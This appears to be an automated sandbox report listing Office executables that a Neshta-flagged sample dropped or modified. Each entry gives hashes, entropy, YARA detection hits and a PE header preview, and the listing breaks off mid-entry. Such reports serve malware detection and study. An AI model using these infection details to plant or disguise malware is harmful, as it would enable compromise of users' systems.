                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxvuAvYalUpgotzYIlHkHwt7//Qt:sr85CqaBotvHkHwK
                                                                        MD5:F3279F5053B3112B5299C08136AE58E9
                                                                        SHA1:5B4C8EA82DC1E296CB31EC7B439B8B6E52795995
                                                                        SHA-256:1A1E7090747C3F600989939E12DA73BD2E85FFCAD10159E7AC52D374DA11874A
                                                                        SHA-512:86A355429C9358EEC0FE6B95623DC26FE7879684CDDB6AEAE293276FC5D604CC37DE64FC520F0EE749A3F6A15E9D5FB53852F9B444A0B3DE1374077578A99564
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4135504331115705
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCC+MHzv1nArfoWBgJCSTgHyyf:sr85CDuv1nqQ2zSESy
                                                                        MD5:A937F48D8198AB59DF93A63E834C4AAF
                                                                        SHA1:4DA8ED9F7A886A8437562470A199744DF6E88F24
                                                                        SHA-256:CA2CA4A45AB550D894AA4B16919FF38ABB7784E532C327891DF71645AB845C6A
                                                                        SHA-512:490CDFC2D7AAF7142889398D70DE668CCCD8D4A52AF7C5FA9D64540CE2740F09A481293F4DFFED1ECCED9827148313D2296CC9BFC9716A88814544930C9DE551
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.344917752925491
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDt+pejhS5enb1o24/tmIY514oZFt4s:sr85CDt+pGQ5E1o24VmIYX4oZP4s
                                                                        MD5:EA546BBE947027BA147DE2719F53D051
                                                                        SHA1:38B150F5A8BE8E19B5D1F2824F8EDE784DE2C6E6
                                                                        SHA-256:930F29A1D4152D23CB5F1E60693191F2865F56EA5474BF720BDC286D518CD9C1
                                                                        SHA-512:D456962B5511F76AF309345C22FCB20EDB120CF4EC3388300FEE1864B13859C605C40B6E86357E698DACA5AED60F56B59DFF1655E3059A9065B9550A7A3C9E1E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.464347380493513
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCSGNDd85lS8adLs4XK9OtiRk+7mLpNKahE:sr85C9NDS5lS8D0K8tMk+7ms
                                                                        MD5:072EDD1A5D3A99C26EA9987890989B31
                                                                        SHA1:6ECC5A3EBEB7EC6EEBBEF28CEB67079A92F57107
                                                                        SHA-256:598CA2D9EB855C5D53C9C19374AFFAAE2E4A6A9C9EBF1F46D2B025B5BD8731B4
                                                                        SHA-512:D11D018159148C9926450A3047B207484D1B31B80BB975B435D6E0FEB497F60625450273C1D834FFAD74C7C581A80224898FDCDC41BB9D3BD799E70AE8EF838E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4498443082331764
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCLddbrls2itD1NrBOTe5IfY2X36Be:sr85CjbO1OTqcX36Be
                                                                        MD5:187B658322698CB74D48476EB2ECB171
                                                                        SHA1:3C4371425F833F6C7643E09BEBA5762B67081611
                                                                        SHA-256:7460BB6E5A2E43F3C737730FE5F9FC5E199072C61B870C07FF35207F333EE496
                                                                        SHA-512:3013808486F1445457BC00B919AFDCC46297B3F167A876EE5F028D50456EBE582C05882D99A0E677531C9FD3796F574AD88AB48FBF394A124F425894F841D636
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.336782734218808
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCEbf/h1xmGzUiVZd0p813HmTJhM3:sr85CMfJ1xmzsHmTHM3
                                                                        MD5:A3977FA0A7C20B05EC69FADE4F852D71
                                                                        SHA1:FE2C747F4DA1C5C85C55EB755CA32D59B0B1EC43
                                                                        SHA-256:1F3B9AB4F318C962967E9418DFEEBF251EF610A0ECE5570E166D84B6A730A932
                                                                        SHA-512:CD8082F275380F4CD67BA08904C116E921C428D8D6BD8BF411A93B42CA9276332AB6E7F46EEC05C697662A98CC70841D12AD3EA6A3DE54EB575DE11BF2A0A1B2
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.531432224892055
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCN5Ss6w5T7tIc+9KLSifgpM5:sr85CrSsp+9KSM5
                                                                        MD5:A651847108A83A8B2A3B75A66403B0DC
                                                                        SHA1:EA7CFC3C984B676C322578E80DCD78DDA75E5A2C
                                                                        SHA-256:A1616D454E5EE365285A3E03455CED1FD70D8EEB682D47A8379EB08CF801D325
                                                                        SHA-512:0B97CD6F46A4660C27E99F140D07BA7F0F380E32062D5F9AF550C161E0191332EB27A196C5CAEFEB94A091CF9294FFEE91604D0FEF329260F768D9669591E2CE
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.556968630457308
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVFFlJhOo/ovdHk4h6zeXVv:sr85CVFFlJhOoGt66F
                                                                        MD5:FB0697C512E65305CF24EFA18EC58086
                                                                        SHA1:B924F5AFE1A14163E20DB2CDCE980017C1461D1E
                                                                        SHA-256:CCA73F1C0206BBB9D6567616808D4BADAFAB7796ED40FC86097032802F2381D3
                                                                        SHA-512:FA3AD9699129E24AEAC778B38EF1B6CEBA11B226E6636635224FCB9019036D9E11726F11F50A9D1D531A8A6F08B5D3A3B650E7416655113284B63412C01B1F60
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.131108501135707
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJaFFlJhl7XC0dHPgzh263DX:JxqjQ+P04wsmJCVFFlJhlLDHmdzX
                                                                        MD5:2DCEF042EE374AC5BA2307EE6D97FFAE
                                                                        SHA1:3E39AD4F60367BAFB47B3759253064F7BA57A92B
                                                                        SHA-256:C83153D11C1D63FF5C330035DD66A958BF19EC465969D82DE87351A2C5F7A99D
                                                                        SHA-512:9319A16EA4B3D49FC1CFC4FE9E5890E2DDAA3E5D1523A150C77E0201C727EA0580E0B2D79CD4914968305B037B987494D57604E4792790069E992EEEE3D5324B
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.254281392784178
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJrBE27rCNzU3GLCAAhUSCr1HkueFNUx+:JxqjQ+P04wsmJCKEJzbmAoDucEMQnF0
                                                                        MD5:D7BF211CED7D30A27312CE4DA2487EE1
                                                                        SHA1:CE664FBA8F5BEAA728CB7EAE107C5ED3810A5DDF
                                                                        SHA-256:9266432725D9466253A4F1F609C9A2DD85FC82B3A0E3A6C43FCB1A267C976265
                                                                        SHA-512:260EA864A9512B243DD18EC3C4D6CA7782DD3ED117AA553E6C30F3249655EEDB3768AC190432CBA66078F93C83F8B05CAB352B254FB58C3586EF56F2C3482EED
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.369176164130001
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmmgFboVWAfMOD9nwcP4McxAF+V2r9Q:sr85CmhFbG5n7vcxAwVIu
                                                                        MD5:E883EB6C4D29614F1887EDF6A2412659
                                                                        SHA1:33DAF7D41A5C6D4D8AB1C91160F775D9810E10F9
                                                                        SHA-256:BE47F38C1D1A3806AD27867DF41BF62AFB77FADCAD4F00CF3B68FD469E1B2154
                                                                        SHA-512:EF18F22EB51AE378651FD7421E56EC682BE64AED01D79FDC1E3366459690AE52E312B4BE3A70C50653EC98C261EE2557C4B4F908AC8254E47B96F7268847F665
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.694866680260046
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC5wI4PqxgWvwG+TUawK:sr85C5wslwG+TUawK
                                                                        MD5:A851E7A4D035C32FCB2830718B34F01C
                                                                        SHA1:6D89FD230ADE8F14971A600591A8B6FAF67CD770
                                                                        SHA-256:73610C44EE38B1785E018C2BC869052729D56C65545F52EE5D2AB89C8C7B6DCE
                                                                        SHA-512:77726930C4BFE2DF33FCADA1A4A493F8DB8B3A5681C5D79DC51F9625C4110680DFA50C44CA272B71E46175FF56954B1583B9771B73412D25D06954AF8AAF81E8
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.511827025814232
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHz6xccTu/YnwN9+ko47VGsKkfrwayHd+f:sr85CT6yHYn+o4Jrn
                                                                        MD5:2DBF9767B1524319753ADE899740500C
                                                                        SHA1:D684A9E8CC28A5185CF477554DF2065D73126877
                                                                        SHA-256:14143B435D60E49B251E80E37857E98D36088EB0CBE02C4C630F381E37BA8F0B
                                                                        SHA-512:A7B9EA44485796E0AA8C51A2A762EA95640EE34FEA51C3F043A5EC37E99EE95054F610C8FB72C445609F90B6EBFA5590036294B8E4770BD483E8926B38C7BDB3
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.361986604416892
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC4QTS8CYtvYSi+GAqeqCifxUajaQ:sr85C42S8/caAUSaQ
                                                                        MD5:8F8291D79A298A9B071864C651BB0794
                                                                        SHA1:F7614B1E0D476F1CBC75B5D698711F9DF460F773
                                                                        SHA-256:E9562B1B83495930753D145E9834CCA9128745E3163C060A4AA3D7DA62AA468F
                                                                        SHA-512:160D10672400D32BB10A059CC2AF3CA79810A9D0FDB88B79F6E0BB208DA26F973965853A429A7D9D4CD30570E015F17EB458DF6C6311BB89394AF46ED8B189E7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.56237653560924
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/MyzuDxqDq2m1eHwSFdrdAHZY:JxqjQ+P04wsmJCOxzuDxqDsmwSFbuY
                                                                        MD5:2CF8F2ECEB42B70A5493D1EAEAC6B20A
                                                                        SHA1:B411993C6352F4B026153AE4010A6C2D7B1ACE3B
                                                                        SHA-256:A85EB54DE3BE548DBE89BC47098B417F4C1029BA084D0B15F75687D0751EF44E
                                                                        SHA-512:8D2514F16C8D47CE668397B6DEF1A59A4D2C7B7E4A8E7613865C4833BE0B882D87AECB02C049B7496D633CA740DEB33A59DE6D0488F21C26109C89F8C511570D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.388189611386593
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/jWSlFQQoUmydAHZk6:JxqjQ+P04wsmJCOjTlWFauk6
                                                                        MD5:62A21A597FA5F5C489D266A87694FE61
                                                                        SHA1:8A9C326ABA5638F6B91BA8DD18D258998CC9D25B
                                                                        SHA-256:D35B0D2411B6D5CDE4F61E5EBD70BBB1644AAE5E95EF417E3E885B20C194DE49
                                                                        SHA-512:F4F9F7C8BDCDC7CAC1D491E528E88464A78F6254F44F2C3758860B495E188B607EA2FB2B292CCD82829F1E462EC07BFDD5F0F1729F7083C9FA398FD7EC133E26
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.131620925268659
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJDK2sNTXC8cEGV6GskwTO:JxqjQ+P04wsmJCOKZxXk6GskwTO
                                                                        MD5:1F414E9B0D1C3584418658367EC9242F
                                                                        SHA1:5D11420BEB0507F3A71925E2A0A2DC36EA1265DF
                                                                        SHA-256:CEB5DB2FF4B04E0C3683D039DB97ACC145C5FB9DD026A7DC9B84F12D424E9488
                                                                        SHA-512:1AE9A3653B774AACEA8A2CD24ED9BAAD8245967E16122F53099A8A640D6BF5C055651C50B5D83C4EBF962060FE021A274EDBFB818093A783884C9AC6DB822D03
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4980851403396676
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHJDYG7YSUhCD8TanIVayX0TfC8cvB11lV:sr85CpDDkSQCfLy0fk11lV
                                                                        MD5:D4811ACDE0C5F48DACC1BBC3E310E8D8
                                                                        SHA1:06F814E81524B40587E503E32B8865D66A8383A6
                                                                        SHA-256:3B5D056392B165F9001BF785E6F91187B75A67F0209E5C189AE0764A66FF3E10
                                                                        SHA-512:6BE82945EAB1E9FD9BA507045B6B45799AFD11F5A3A30949E03FA100F93750DD0ECEBECABDB1883B764C90791ABED09EE191588BB8A8241AC6A6AFAAA120C169
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.57605386644689
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMfSoIt2ZzzV9uc1EshwMDkEcAv4i+:sr85Cnkz//1DgEcAv5+
                                                                        MD5:100E15577B28178663E63AB854D28B4A
                                                                        SHA1:DC7D931ECDA8C09D0D2B43988E6D689A20E080F1
                                                                        SHA-256:238254BCE07446426D478897AC3DE27DE2B9606B2E8477F7DDAF8A20A2999FC4
                                                                        SHA-512:5F5A2C7F553B747A9A1811E9D4D3A0BDA525D5977D5BB709F65164308E020B31A7EC0029C435D8F05E46E737242BB5F934D0094728841F6C545E15C625444C47
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):4.744720269791172
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJozp/q4:JxqjQ+P04wsmJCV/Z
                                                                        MD5:316C81CA54C5FAC241D16CA25E7B341C
                                                                        SHA1:9E1199BCB359EA9146EAD52E765F3913A791CD7A
                                                                        SHA-256:9CE3D752106B78CBB5CF3DF574CD084177C4CF97FF35CC6E983EAD6F4A3F6CE1
                                                                        SHA-512:CEC15054D8351322566F67B46B333F11064CB650D4ADDCDBC9174C66EE4E4D4F1C3400FDE6BBDCD3B632ED051C92E898C5170B1A6504BB11A771230D4EA15D3F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
